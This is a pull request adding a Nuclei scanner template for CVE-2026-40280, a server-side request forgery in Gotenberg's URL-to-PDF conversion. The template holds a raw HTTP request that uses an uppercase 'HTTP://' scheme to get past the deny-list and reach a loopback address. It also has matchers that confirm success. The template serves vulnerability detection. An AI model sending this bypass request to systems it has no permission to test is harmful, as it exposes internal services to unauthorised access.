### PR TITLE
Add CVE-2026-40280 template

### DIFF
--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -1,0 +1,40 @@
+id: cve-2026-40280-gotenberg-downloadfrom-ssrf
+
+info:
+  name: Gotenberg DownloadFrom SSRF Deny-List Scheme Bypass (CVE-2026-40280)
+  author: str4k3r
+  severity: critical
+  description: >
+    Gotenberg versions before 8.31.0 use a case-sensitive default private-IP
+    deny-list for the Chromium URL conversion downloadFrom feature. An
+    uppercase HTTP scheme bypasses the regex while net/url.Parse normalizes
+    the scheme, allowing a request to the loopback service. The conversion
+    endpoint returns a PDF only when the SSRF request is accepted.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-40280
+  classification:
+    cve-id: CVE-2026-40280
+  tags: cve,cve2026,gotenberg,ssrf,downloadfrom
+
+http:
+  - raw:
+      - |-
+        POST /forms/chromium/convert/url HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=forge
+
+        --forge
+        Content-Disposition: form-data; name="url"
+
+        HTTP://127.0.0.1:3000/health
+        --forge--
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: header
+        words:
+          - "application/pdf"


### PR DESCRIPTION
Adds the Nuclei template for CVE-2026-40280 based on the public advisory and includes the HTTP request and response matchers for maintainer review.